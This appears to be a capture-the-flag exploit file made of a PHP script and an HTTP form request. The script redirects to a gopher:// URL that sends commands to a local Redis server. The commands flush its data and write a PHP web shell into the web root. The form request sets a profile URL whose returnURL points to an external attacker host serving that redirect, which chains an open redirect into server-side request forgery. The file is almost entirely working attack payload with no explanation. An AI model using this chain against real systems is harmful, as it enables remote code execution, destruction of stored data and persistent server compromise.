mytask_full_exploit_1.php

```php
<?php
        header("Location: gopher://127.0.0.1:6379/_FLUSHALL%0d%0aeval%20%27redis.call%28%22set%22%2C%20%22%3C%3Fphp%20eval%28%24_GET%5Bcmd%5D%29%3B%20%3F%3E%22%2C%20%22test%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dir%22%2C%20%22/var/www/html/cache/%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dbfilename%22%2C%20%22exploit.php%22%29%3B%27%200%0d%0asave%0d%0aquit%0d%0a");
?>
```

```
------WebKitFormBoundaryyx4ywOKfeaO8nCA7
Content-Disposition: form-data; name="pw"

1234
------WebKitFormBoundaryyx4ywOKfeaO8nCA7
Content-Disposition: form-data; name="nick"

testidcc
------WebKitFormBoundaryyx4ywOKfeaO8nCA7
Content-Disposition: form-data; name="profile"

http://www.adm1nkyj-kuploadbox.com/index.php?ad=member&mi=login&id=testid3&pw=1234&returnURL=http://exploit-adm1nkyj-kuploadbox.com/mytask_full_exploit_1.php&send=login
------WebKitFormBoundaryyx4ywOKfeaO8nCA7--
```